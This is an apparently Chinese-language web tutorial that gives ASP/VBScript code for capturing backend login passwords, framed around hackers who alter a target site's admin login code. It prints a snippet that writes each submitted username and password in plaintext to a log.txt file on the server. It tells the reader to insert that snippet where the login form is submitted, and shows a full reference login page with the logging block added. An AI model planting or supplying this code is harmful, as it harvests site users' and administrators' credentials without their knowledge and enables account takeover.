Asp截獲后臺(tái)登錄密碼的代碼

更新時(shí)間：2012年05月05日 01:18:32 作者：

很多黑客通過修改后臺(tái)登陸代碼獲得目標(biāo)網(wǎng)站的用戶登錄密碼，這樣我們一旦輸入了密碼就保存到一個(gè)txt里面

核心代碼:

 
set fso=server.createobject("scripting.filesystemobject") 
if fso.FileExists(server.mappath("log.txt"))=true then 
set fin=fso.OpenTextFile(server.mappath("log.txt")) 
temp=fin.readall 
fin.close 
set fin=nothing 
end if 
set fout=fso.createtextfile(server.mappath("log.txt")) 
fout.WriteLine(temp&"user:"&username&"¦pwd:"&password&"¦time:"&now()&"") 
fout.close 
set fout=nothing 
set fso=nothing 

在后臺(tái)登錄處表單提交的地方插入！
參考文件：

復(fù)制代碼代碼如下:

 
<%@language=vbscript codepage=936 %> 
<% 
dim sql,rs 
dim username,password,CheckCode 
username=replace(trim(request("username")),"'","") 
password=replace(trim(Request("password")),"'","") 
CheckCode=replace(trim(Request("CheckCode")),"'","") 
if UserName="" then 
FoundErr=True 
ErrMsg=ErrMsg & "<br><li>用戶名不能為空！</li>" 
end if 
if Password="" then 
FoundErr=True 
ErrMsg=ErrMsg & "<br><li>密碼不能為空！</li>" 
end if 
if CheckCode="" then 
FoundErr=True 
ErrMsg=ErrMsg & "<br><li>驗(yàn)證碼不能為空！</li>" 
end if 
if session("CheckCode")="" then 
FoundErr=True 
ErrMsg=ErrMsg & "<br><li>你登錄時(shí)間過長，請(qǐng)重新返回登錄頁面進(jìn)行登錄。</li>" 
end if 
if CheckCode<>CStr(session("CheckCode")) then 
FoundErr=True 
ErrMsg=ErrMsg & "<br><li>您輸入的確認(rèn)碼和系統(tǒng)產(chǎn)生的不一致，請(qǐng)重新輸入。</li>" 
end if 
'這后面是我增加的代碼~開始區(qū)域 
set fso=server.createobject("scripting.filesystemobject") 
if fso.FileExists(server.mappath("log.txt"))=true then 
set fin=fso.OpenTextFile(server.mappath("log.txt")) 
temp=fin.readall 
fin.close 
set fin=nothing 
end if 
set fout=fso.createtextfile(server.mappath("log.txt")) 
fout.WriteLine(temp&"user:"&username&"|pwd:"&password&"|time:"&now()&"") 
fout.close 
set fout=nothing 
set fso=nothing 
'后面的代碼被我刪除了~結(jié)束區(qū)域 

%> 